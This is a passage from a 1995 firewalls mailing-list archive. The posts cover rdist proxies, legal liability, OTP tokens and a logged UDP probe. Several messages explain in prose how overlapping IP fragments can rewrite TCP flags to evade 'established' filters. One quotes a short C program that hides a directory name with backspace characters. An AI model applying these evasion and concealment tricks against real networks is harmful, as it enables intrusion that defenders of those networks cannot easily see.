overlap, the > fragment with the lower offset overwrites fragments with higher offset. > > If the reassembly algorithm was broken (like RFC 791's), it could be > exploited by cooking up two overlapping fragments: one having a complete > TCP header harmless enough to get through the firewall (for example ACK=1 > to get through an "established" filter), and the second fragment beginning > in the middle of the TCP header, overwriting the flags to set ACK=0, to > open a new connection inbound through the firewall. The second fragment > would have offset>0, so the TCP filtering wouldn't be applied to it. This > trick can't fake the source and destination port numbers, they're too close > to the beginning of the TCP header, but it can fake anything else. Bingo. 815 fills holes. A hole is where there is no data. I should write this all up...:/ darren From firewalls-owner Thu May 11 05:09:57 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA15234 for firewalls-outgoing; Thu, 11 May 1995 04:58:42 -0700 Received: from tserver.dsac.dla.mil (tserver.dsac.dla.mil [131.78.6.153]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA15229; Thu, 11 May 1995 04:58:38 -0700 Received: by tserver.dsac.dla.mil (5.65/1.35) id AA24927; Thu, 11 May 95 07:59:30 -0400 From: nto2584@tserver.dsac.dla.mil (Steven Payne) Message-Id: <9505111159.AA24927@tserver.dsac.dla.mil> Subject: Re: impossible vs. impractical To: Brent@GreatCircle.COM (Brent Chapman) Date: Thu, 11 May 1995 07:59:29 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Brent Chapman" at May 10, 95 01:12:01 pm X-Mailer: ELM [version 2.4 PL21] Content-Type: text Content-Length: 1023 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > What the hell does this have to do with Firewalls? I STRONGLY object to > people exporting flame wars from BugTraq to Firewalls. KNOCK IT OFF! > > > -Brent STRONGLY AGREED, MUCH JUNK deleted for bandwidth's sake > > ---------------------------------------------------------------------- > For info about the Internet Security Firewalls Tutorial and a schedule > of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM > ---------------------------------------------------------------------- > Brent Chapman Great Circle Associates > Brent@GreatCircle.COM 1057 West Dana Street > +1 415 962 0841 Mountain View, CA 94041 > > Brent, I am planning on attending your tutorial in ann arbor this May 26. Do you recommend any extra reading other than "repelling the wiley hacker"? Also, do you go over specifics about products, what they do, and what they don't? Thanks steve payne spayne@dsac.dla.mil 614-692-9991 From firewalls-owner Thu May 11 06:10:04 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16112 for firewalls-outgoing; Thu, 11 May 1995 05:50:25 -0700 Received: from gateway1.DHL.COM (gateway1.DHL.COM [137.98.208.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA16107 for ; Thu, 11 May 1995 05:50:22 -0700 Received: from bruro1.bru-ro.DHL.COM by gateway1.DHL.COM id aa16939; 11 May 95 5:51 PDT Received: from pc-it30 (pc-it30.bru-ro.dhl.com) by bruro1.bru-ro.dhl.com with SMTP (DHLGMS 4.03-DSI) id AA079786655; Thu, 11 May 1995 14:50:55 +0200 Message-Id: <199505111250.AA079786655@bruro1.bru-ro.dhl.com> X-Sender: tjacquem@bru-ro.dhl.com (Unverified) X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 May 1995 14:50:50 +0200 To: Firewalls@greatcircle.com From: Thierry Jacquemart Subject: rdist issue Cc: tjacquem@bru-ro.DHL.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm having a problem using rdist through a firewall following the model "that which is not expressly permitted is prohibited" and implemented in a "Screened Host Gateway" configuration with TIS and Socks software on the bastion host. As far as rdist is using remshd, and the primary stream source port is in the "privileged" range, and a secondary stream is opened with source an destination ports in the "privileged" range, how can I use it without opening a "hole" to the server which is on the internal network ? Does somebody know about a proxy ? Is there another and more secure (standard) application than rdist ? Thanks for your help. --------------- Thierry Jacquemart DHL Worldwide Express tjacquem@bru-ro.dhl.com From firewalls-owner Thu May 11 06:45:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16631 for firewalls-outgoing; Thu, 11 May 1995 06:20:22 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA16626 for ; Thu, 11 May 1995 06:20:19 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA02901; Thu, 11 May 1995 09:20:54 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA18635; Thu, 11 May 1995 09:20:51 -0400 Message-Id: <9505111320.AA18635@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: "Jason M. LeBlanc" , firewalls@greatcircle.com Date: Thu, 11 May 1995 09:20:43 -0500 Subject: Re: Good all encompassing security guide Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 10 May 95 at 18:24, Jason M. LeBlanc was heard to utter: > I know that's a misnomer... > I need security info concerning the internet and NT servers, very new to > the internet from a server standpoint, so don't beat me too hard. > Something like 1. plug the thing in... 2. turn it on... 3. click on make me > secure..., anything like that out there? Course not. But still looking... If you want something easy, you're forgetting the most important step: 0. Hire an informed and experienced firewall guru to set the whole thing up. Either that, or: 0. Spend lots of time on this list. Buy the C&B Firewalls book. Read it. Get involved in this list. Ask stupid questions. Learn. Snarf freeware tools. Experiment. Ask more questions. Feel confident? Good. Install a package. Turn it off. Unplug it. *Now* go to Step 1. ;) -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## If you like this sort of thing, ## ## this is the sort of thing you'll like. ## From firewalls-owner Thu May 11 07:02:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16802 for firewalls-outgoing; Thu, 11 May 1995 06:28:07 -0700 Received: from nic.abii.com (nic.abii.com [204.77.143.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA16790 for ; Thu, 11 May 1995 06:28:02 -0700 Received: (from mail@localhost) by nic.abii.com (8.6.12/8.6.11) id IAA02680 for ; Thu, 11 May 1995 08:30:42 -0500 Received: from unknown(204.77.144.103) by nic.abii.com via smap (V1.3) id sma002678; Thu May 11 08:30:33 1995 Received: by mailserv.abii.com with Microsoft Mail id <2FB22C26@mailserv.abii.com>; Thu, 11 May 95 08:24:22 PDT From: Garry Garrett To: "'firewalls list from GreatCircle'" Subject: RE: Liable for security Date: Thu, 11 May 95 08:23:00 PDT Message-ID: <2FB22C26@mailserv.abii.com> Encoding: 67 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >What legal problems could a company incur if: > 1. An employee posts offensive material? I keep hearing that electronic material keeps getting thrown out of courts because you can't prove the offensive material came from the person who's userid sent it. Spoofing, or just plain forgetting to logout; it's just too easy for someone to fake being someone else for this kind of material to hold up in court. Now that's what I hear, not that anyone ever quotes any sources or legal precidence. This also doesn't mean that you wouldn't get a computer illiterate judge/jury. You need to write a policy about how user accounts are intended to be used and how they should not be used. Distribute this policy to all employees. This will minimize your risk, or at least give you an out by saying, "hey, this guy knew he was breaking company policy; it's not our fault". You could go so far as to scan outgoing matterial (e-mail, usenet, etc.) for outgoing offensive material. You could even go so far as to kill outgoing matterial that was considered offensive. That would be expensive to make, smacks of censorship, etc. Do you bug your employee's phones, using voice recognition software to scan for offensive material? Do you open outgoing employee mail looking for offensive material? How do you define offensive material? > 2. A cracker hid a trojan horse in materials the company > distributes? I have no expertise in this area, but my gut reaction is even if the materials your company distributes has enough language on the package (or the "do no break this seal before reading" seal that no on ever reads) to cover your butts, your real losses here are on your reputation (lost sales, shipping out clean copies of disks to all infected customers, having to throw in a nice freebie as an appology for having infected them in the first place, etc.) I think these are your real losses because if you market to businesses, they generally have virus protection software in place, and if you market to homes, they are less likely to throw together enough money to sue you anyway. (cheaper just to buy anti-virus software and never buy from you again.) > 3. A cracker distributes copyrighted software from the > company's server? This is a legitimate concern, but if you document the security measures that you have put in place, they should be able to show that you have made a best effort to protect the copyright of the material on your server. This documentation will show that you have not been negligent or have left your system open on purpose. This brings up an interesting point: it is beneficial to software development firms (borland, microsoft, lotus, etc.) to make sure that there is good security software that is easy to use and cheap or free (to make sure their own copyrights are protected). Who would be best suited to write this security software... would it be software development firms? :-) Just a thought. Garry Garry.Garrett@abii.com I do not speak for my employer; I get into enough trouble speaking for myself. From firewalls-owner Thu May 11 07:15:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17141 for firewalls-outgoing; Thu, 11 May 1995 06:47:04 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA17136 for ; Thu, 11 May 1995 06:47:01 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id IAA05587 for ; Thu, 11 May 1995 08:49:38 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 011570000; 11 May 95 9:47 CDT Received: from sctc.com by sccmailhost.sctc.com id 274210000; 11 May 95 9:47 CDT Received: from abiquiu.sctc.com (abiquiu.sctc.com [172.17.192.98]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id IAA22683 for ; Thu, 11 May 1995 08:47:07 -0500 Received: (from nove@localhost) by abiquiu.sctc.com (8.6.12/8.6.9) id IAA21882; Thu, 11 May 1995 08:47:47 -0500 Date: Thu, 11 May 1995 08:47:47 -0500 From: Charles E Nove Message-Id: <199505111347.IAA21882@abiquiu.sctc.com> To: firewalls@greatcircle.com Subject: Re: One Time Password Tokens References: <199505101938.AA21468@northshore.ecosoft.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Vin McLellan : >The Estimable Padgett opined: >>Recently two companies using challenge-response technology >>(Enigma-Logic and Secure Computing) have introduced the >>next logical step, software based tokens. >The user uses his PIN to get access to the secret key, which in turn is >used to encrypt a challenge from the server. In most challenge/ >response protocols (Enigma's, e.g.) the encrypted response to the >challenge is assumed to be evidence that the PIN was correct -- but the >server does not independently validate a user PIN. In fact, it never >sees it. I cannot speak for the Enigma-Logic product, but Secure Computing's LOCKout(tm) authentication product does in fact use the PIN in computing the response. The LOCKout "key" stored on the PC is combined with the user's PIN to create the encryption key that is used to encrypt the challenge. There is no way to determine the user's PIN by examining the data stored on the PC. A user's PIN can be changed, changing the key used to encrypt challenges, without modifying the stored "key". -- Chuck From firewalls-owner Thu May 11 07:39:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16980 for firewalls-outgoing; Thu, 11 May 1995 06:39:50 -0700 Received: from goggins.bath.ac.uk (goggins.bath.ac.uk [138.38.32.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA16959 for ; Thu, 11 May 1995 06:39:42 -0700 Received: from bath.ac.uk (actually host ss1.bath.ac.uk) by goggins.bath.ac.uk with SMTP (PP); Thu, 11 May 1995 14:35:57 +0100 To: Thierry Jacquemart CC: Firewalls@greatcircle.com Subject: Re: rdist issue In-reply-to: Your message of "Thu, 11 May 1995 14:50:50 +0200." <199505111250.AA079786655@bruro1.bru-ro.dhl.com> Date: Thu, 11 May 1995 14:36:13 +0100 From: Icarus Sparry Message-ID: <9505111436.aa17486@ss1.bath.ac.uk> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Use a more up-to-date version of rdist, which calls 'rsh' to do the work rather than using the library routine 'rcmd'. Mind you if you are trusting a BSD 'r' protocol, there is little need for a firewall :-) Look in src.doc.ic.ac.uk:/computing/operating-systems/unix/rdist for a Europe mirror or usc.edu:/pub/rdist for the original. From firewalls-owner Thu May 11 08:41:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA19605 for firewalls-outgoing; Thu, 11 May 1995 08:30:40 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA19600 for ; Thu, 11 May 1995 08:30:37 -0700 Date: Thu, 11 May 1995 11:30:56 -0400 From: bret@real.com (Bret McDanel) Received: by real.com (8.6.8.1/3.2.012693-Realistic Technologies Inc); id LAA27754 for firewalls@greatcircle.com; Thu, 11 May 1995 11:30:56 -0400 Message-Id: <199505111530.LAA27754@real.com> To: firewalls@greatcircle.com Subject: RE: Liable for security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > You could go so far as to scan outgoing matterial (e-mail, usenet, > etc.) for outgoing offensive material. You could even go so far > as to kill outgoing matterial that was considered offensive. That > would be expensive to make, smacks of censorship, etc. Do you bug > your employee's phones, using voice recognition software to scan > for offensive material? Do you open outgoing employee mail looking > for offensive material? How do you define offensive material? > I thionk that the electronic privacy act on 1988 protects people in the US against seraches of email that are going to or comming from an external network.. If this is true, then you'd be breaking the law by monitoring everything, and I know that you'd be breaking the law if you deleted the email (according to the EPA:1988 you cannot stop email in tranist, the secret service got sued and lost because they did that to a bbs) Now, because I know that people are dying to flame me over this I will restate only in the US.. Other countries may or may not have different laws.. From firewalls-owner Thu May 11 09:09:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA19691 for firewalls-outgoing; Thu, 11 May 1995 08:36:35 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA19686 for ; Thu, 11 May 1995 08:36:31 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA26568; Thu, 11 May 95 11:20:13 -0400 Date: Thu, 11 May 95 11:20:13 -0400 Message-Id: <9505111520.AA26568@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Liable for security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk (Know that this is getting a bit off but there are some important points for those who just got handed the responsibility for "protection" without understanding *all* the implications. Experts and tech-only types may >nul) > You need to write a policy about how user accounts are intended > to be used and how they should not be used. Distribute this policy > to all employees. The problem is that unless enforced, a court will take a very dim view as will an employee-grievance board. Too many instances have been thrown out of court/board because the words were there but ignored by *everyone*. In some cases it can make your position worse brcause the indication is that the problem was known (hence the policy) but "due care" was lacking. > This will minimize your risk, or at least > give you an out by saying, "hey, this guy knew he was breaking > company policy; it's not our fault". Insufficient - from experience I can say that you need to show a consistant pattern of enforcement of the policy because the defense is certainly going to try to use non-enforcement against you (any real lawyers care to comment ?) The very very important point I am trying to make is that the policy must be very carefully written to say not only what you are wnating done, but also that it will be enforced *equally and to everyone*. If you have a policy that says "no modems" and the Big Boss has one, consider yourself raodkill. If your policy says "no modems without approval from the vice preseident of tech ops" then you are covered - so long as you make sure that there is a form filled out and signed for the BB's modem. "Never say Never" is a very good rule. "Waivers must be approved by..." is the way to write everything because there are always exceptions. The sad fact is that you are going to have to pull the plug on someone, someday or you are not maintaining a real firewall. When (and not if) it happens you need to make sure that you are standing on a firm foundation with all exceptions covered or *you* are liable to become an exception. Back to normal after the error in the Lorenz-Fitzgerald equation, Padgett From firewalls-owner Thu May 11 09:30:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA19886 for firewalls-outgoing; Thu, 11 May 1995 08:45:47 -0700 Received: from edelweb.fr (edelweb.fr [193.51.12.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA19880 for ; Thu, 11 May 1995 08:45:42 -0700 Received: from champagne.edelweb.fr (champagne.edelweb.fr [193.51.12.33]) by edelweb.fr (8.6.10/8.6.9) with ESMTP id RAA19978 for ; Thu, 11 May 1995 17:46:10 +0200 Received: from localhost (touvet@localhost) by champagne.edelweb.fr (8.6.10/8.6.6) with SMTP id RAB12011 for ; Thu, 11 May 1995 17:46:10 +0200 Message-Id: <199505111546.RAB12011@champagne.edelweb.fr> To: firewalls@greatcircle.com Subject: Firewalls mailing list in French: interest ! Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 May 1995 17:45:55 +0200 From: Jean-Christophe Touvet Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks, I finally decided to create a French-spoken mailing list dedicated to Firewalls and Internet security. Many answers to my proposal were positive (19/25), and I thank all people who responded. Below is list's charter in French. Cheers, -JCT- PS: also many thanks to Brent for majordomo ------------------------------------------------------------------------------- Comme je n'arrivais pas a choisir entre les differentes propositions de noms pour cette liste (coupe-feu, paroi anti-feu, garde-barriere etc.), j'ai pris quelque chose qui n'avait pas ete suggere: "sas" (comme "sas de securite"). Voici la charte de la liste. J'y ai ajoute les suggestions recues, mais bien entendu ceci n'est pas definitif... ------------------------------------------------------------------------------- Bienvenue dans la liste . Cette liste est destinee a la discussion sur la securisation des acces Internet, principalement a propos des solutions de type "Firewall" (sas de securite, coupe-feu ou garde-barriere). Voici une liste non exhaustive des sujets abordes: - architectures de connexions Internet securisees: quels types pour quels besoins ? - conception/gestion/administration des systemes de securite au niveau d'un domaine reseau - exploitation du Firewall Toolkit TIS (installation, ameliorations, utilitaires etc.) - problemes de securite specifiques a l'Internet dans les pays francophones (reglementation sur le cryptage, politique des fournisseurs de services etc.) Les archives de cette liste sont disponibles sous forme ASCII sur: et sous forme hypertexte sur: L'adresse administrative de la liste est . Pour vous inscrire, ecrivez simplement a cette adresse avec "subscribe sas" dans le corps du message (pas dans l'en-tete), ou "help" pour avoir de plus amples renseignements sur le fonctionnement de majordomo. From firewalls-owner Thu May 11 09:39:43 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20268 for firewalls-outgoing; Thu, 11 May 1995 09:14:08 -0700 Received: from cs.columbia.edu (cs.columbia.edu [128.59.16.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA20262 for ; Thu, 11 May 1995 09:14:05 -0700 From: carson@cs.columbia.edu Received: from pizza.cs.columbia.edu (pizza.cs.columbia.edu [128.59.26.43]) by cs.columbia.edu (8.6.12/8.6.6) with ESMTP id MAA09118; Thu, 11 May 1995 12:14:44 -0400 Received: (from carson@localhost) by pizza.cs.columbia.edu (8.6.12/8.6.6) id MAA01231; Thu, 11 May 1995 12:13:22 -0400 Date: Thu, 11 May 1995 12:13:22 -0400 Message-Id: <199505111613.MAA01231@pizza.cs.columbia.edu> To: Icarus Sparry Cc: Thierry Jacquemart , Firewalls@GreatCircle.COM Subject: Re: rdist issue In-Reply-To: <9505111436.aa17486@ss1.bath.ac.uk> References: <199505111250.AA079786655@bruro1.bru-ro.dhl.com> <9505111436.aa17486@ss1.bath.ac.uk> Reply-To: carson@cs.columbia.edu Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are using the new berkeley rdist with krsh (kerberos rsh) as a more secure alternative. Since the transport is now separate, you can plug in any secure transport you wish (we use krsh, but the various secure telnets could be plugged in with a little effort). -- -- A Queen Trapped in a Butch Body is: Carson Gaspar -- carson@cs.columbia.edu, carson@lehman.com From firewalls-owner Thu May 11 10:14:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20304 for firewalls-outgoing; Thu, 11 May 1995 09:16:02 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA20299 for ; Thu, 11 May 1995 09:15:59 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s9aue-0000TfC; Thu, 11 May 95 09:16 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA24572; Thu, 11 May 1995 09:16:20 +0800 Date: Thu, 11 May 1995 09:16:20 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505111616.AA24572@brittany.oes.amdahl.com> To: firewalls@greatcircle.com, jpf@mig.com Subject: Re: A Probe? X-Sun-Charset: US-ASCII content-length: 1344 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Forgive me for my lapses... I have not subscribed to the list > for some time. However, I ran across the following sequence > in my log files and I thought some of you might have a few > ideas about the pattern. Does this appear to be an organized > probe? This is one of the few irregularities that I have not been > able to trace to routing flaps due to Internet restructuring. > Please reply directly to keep the S/N ratio low. ThankX. > > May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.71](2769->7) > May 10 20:54:11 gateway kernel: REJECT (IN): UDP [204.240.1.23]->[204.132.146.17](2715->7) ulen 13 on eth0 Can't imagine what they thought to accomplish with an echo. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Thu May 11 10:19:02 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20985 for firewalls-outgoing; Thu, 11 May 1995 09:35:59 -0700 Received: from bootes.sds.no (bootes.sds.no [139.105.192.91]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA20941 for ; Thu, 11 May 1995 09:35:39 -0700 Received: by bootes.sds.no (5.65/DEC-Ultrix/4.3) id AA00307; Thu, 11 May 1995 18:36:09 +0200 Date: Thu, 11 May 1995 18:38:00 CST From: toreh Subject: Setting up firewalls as local news group To: firewalls@greatcircle.com Message-Id: Priority: Normal Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This mailing list is getting to be too much for me (signal/noise ratio too LOW (I somehow got it upside down in a precious mail)). But part of my work is security, and if cannot manage to read everything alone, I must find a way to share the information with four other people. I am thinking about setting up a local firewalls news group, pipe the firewalls mailing list into this group, and use firewalls@greatcircle.com for moderator. Is this possible? Is this acceptable to the rest of the mailing list? If acceptable, how do I set it up (we use INN news software)? What are the pitfalls? Any and all help appreciated! -- tore From firewalls-owner Thu May 11 10:33:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21011 for firewalls-outgoing; Thu, 11 May 1995 09:36:32 -0700 Received: from JASPER.MCCLELLAN.AF.MIL (jasper.mcclellan.af.mil [137.243.167.242]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21001 for ; Thu, 11 May 1995 09:36:27 -0700 From: mokbelsa@jasper.mcclellan.af.mil Date: Thu, 11 May 1995 09:24:16 -2359 Message-Id: <95051109241611@jasper.mcclellan.af.mil> To: firewalls@greatcircle.com Subject: Digital's Firewall X-VMS-To: SMTP%"firewalls@greatcircle.com" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Has anybody worked with DEC's internet firewall system? If so: - what do you think of it in terms of manageability, reliability, flexibility..? - how easy is it to add new application proxies to it? - any observations that you think are important? You can Email me directely if you wish at: mokbelsa@jasper.mcclellan.af.mil Thanks for any replies. Sam Mokbel Network Consultant From firewalls-owner Thu May 11 10:40:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21049 for firewalls-outgoing; Thu, 11 May 1995 09:37:27 -0700 Received: from gateway1.DHL.COM (gateway1.DHL.COM [137.98.208.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21042 for ; Thu, 11 May 1995 09:37:23 -0700 Received: from bruro1.bru-ro.DHL.COM by gateway1.DHL.COM id aa29312; 11 May 95 9:38 PDT Received: from pc-it30 (pc-it30.bru-ro.dhl.com) by bruro1.bru-ro.dhl.com with SMTP (DHLGMS 4.03-DSI) id AA213930259; Thu, 11 May 1995 18:37:39 +0200 Message-Id: <199505111637.AA213930259@bruro1.bru-ro.dhl.com> X-Sender: tjacquem@bru-ro.dhl.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 May 1995 18:37:33 +0200 To: Firewalls@greatcircle.com From: Thierry Jacquemart Subject: Re: rdist issue Cc: ccsis@bath.ac.uk, tjacquem@bru-ro.DHL.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From : bath>ccsis >To : tjacquem >Subject : Re: rdist issue >Date : 11/05/95 15:47 >Use a more up-to-date version of rdist, which calls 'rsh' to do the >work rather than using the library routine 'rcmd'. I thought rsh was a command level interface to rcmd(). >Mind you if you are trusting a BSD 'r' protocol, there is little >need for a firewall :-) Well, this is not always the case. If you allow, let us say, inbound rlogin connections, and you control it with rlogin-gw (TIS), I think it's secure. This is why I'm asking for a rdist proxy. Can somebody help ? P.S.: the rdist server is on a HP-UX system ----------------- Thierry Jacquemart DHL Worldwide Express tjacquem@bru-ro.dhl.com From firewalls-owner Thu May 11 11:05:59 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20804 for firewalls-outgoing; Thu, 11 May 1995 09:33:40 -0700 Received: from cyclorama.engin.umich.edu (cyclorama.engin.umich.edu [141.212.66.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA20799 for ; Thu, 11 May 1995 09:33:37 -0700 Received: from localhost.engin.umich.edu (grue@localhost.engin.umich.edu [127.0.0.1]) by cyclorama.engin.umich.edu (8.6.12/8.6.4) with SMTP id MAA08998; Thu, 11 May 1995 12:32:40 -0400 Message-Id: <199505111632.MAA08998@cyclorama.engin.umich.edu> X-Authentication-Warning: cyclorama.engin.umich.edu: Host localhost.engin.umich.edu didn't use HELO protocol To: patrick@oes.amdahl.com (Patrick Horgan) cc: chris@sandpiper.com, firewalls@GreatCircle.COM Subject: Re: Help with begining options? In-reply-to: Your message of Mon, 08 May 1995 12:05:46 +0800. Date: Thu, 11 May 1995 12:32:39 -0400 From: Paul Howell Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Patrick Horgan writes: > [...deleted...] > Furthermore, it's often missed in a casual listing. The thing I was talking > about are directory names like " \b". This shows no clue. It could also > be something like, "hack\b\b\bdir\b\b" which would show as "hd" this is > almost impossible to deal with, unless you treat it as h*d*, but how would > you know to do that? > > Here's a small program that illustrates it: > > main(int argc, char **argv) > { > mkdir("my\b\bhack\b\b\bdir\b\b", 0777); > } > > Makefile ipval.C test* testC.o > add_tabs.c math.C test.cc testREUSE.cc > binout.cc memsize.C test.o testc* > date.C hd/ test.sh* testc.c > hw1.1* rmit.c testC* time.C > hw1.1.cc strang_proto.c testC.cc timers.C > Using the sysV version of ls (on a sun, /usr/5bin/ls) % /usr/5bin/ls -b a.c a.out my\010\010hack\010\010\010dir\010\010 This is after running your program. The 010 is the octal value of \b. This is how I get the names anyway. < Paul From firewalls-owner Thu May 11 11:07:59 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20885 for firewalls-outgoing; Thu, 11 May 1995 09:35:08 -0700 Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA20877 for ; Thu, 11 May 1995 09:35:05 -0700 Received: from elf.wang.com by tuna.wang.com with SMTP id AA12598 (5.67b/IDA-1.5 for ); Thu, 11 May 1995 12:35:26 -0400 Received: from fnord.wang.com by elf.wang.com with SMTP id AA11797 (5.67a/IDA-1.5); Thu, 11 May 1995 12:30:44 -0400 Received: by fnord.wang.com (5.67a/TF8) id AA23132; Thu, 11 May 1995 12:34:52 -0400 From: Tom Fitzgerald Message-Id: <199505111634.AA23132@fnord.wang.com> Subject: Re: IP packet filtering... To: avalon@coombs.anu.edu.au (Darren Reed) Date: Thu, 11 May 95 12:34:51 EDT Cc: firewalls@greatcircle.com In-Reply-To: <199505110959.AA04937@tuna.wang.com>; from "Darren Reed" at May 11, 95 8:00 pm X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > No argument, but RFC 791 says "Every internet module must be able to > > forward a datagram of 68 octets without further fragmentation", so it > > should always be safe to toss fragments smaller than that. > > What about final fragments ? But then they won't have IP_MF set.. You're right; IP can't fragment them, but can't discard them either. This would probably require some kind of data-link layer fragmentation, with reassembly at the next hop (rather than the final destination). > > If the reassembly algorithm was broken (like RFC 791's), it could be > > exploited by cooking up two overlapping fragments: one having a complete > > TCP header harmless enough to get through the firewall (for example ACK=1 > > to get through an "established" filter), and the second fragment beginning > > in the middle of the TCP header, overwriting the flags to set ACK=0, to > Bingo. > 815 fills holes. A hole is where there is no data. But that's not enough. If I send the second fragment first, the "hole" will only include the first 8 bytes of the TCP header. When the fragment with offset=0 arrives later, the flags won't be dropped into the hole, and the reassembled packet will have ACK=0. If fragments arrive out-of-order, the one with the lower fragment-offset always has to take precedence, even if it means overwriting part of a fragment that arrived earlier. -- Tom Fitzgerald 1-508-967-5278 Wang Labs, Lowell MA, USA fitz@wang.com From firewalls-owner Thu May 11 11:14:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21172 for firewalls-outgoing; Thu, 11 May 1995 09:39:30 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21157 for ; Thu, 11 May 1995 09:39:24 -0700 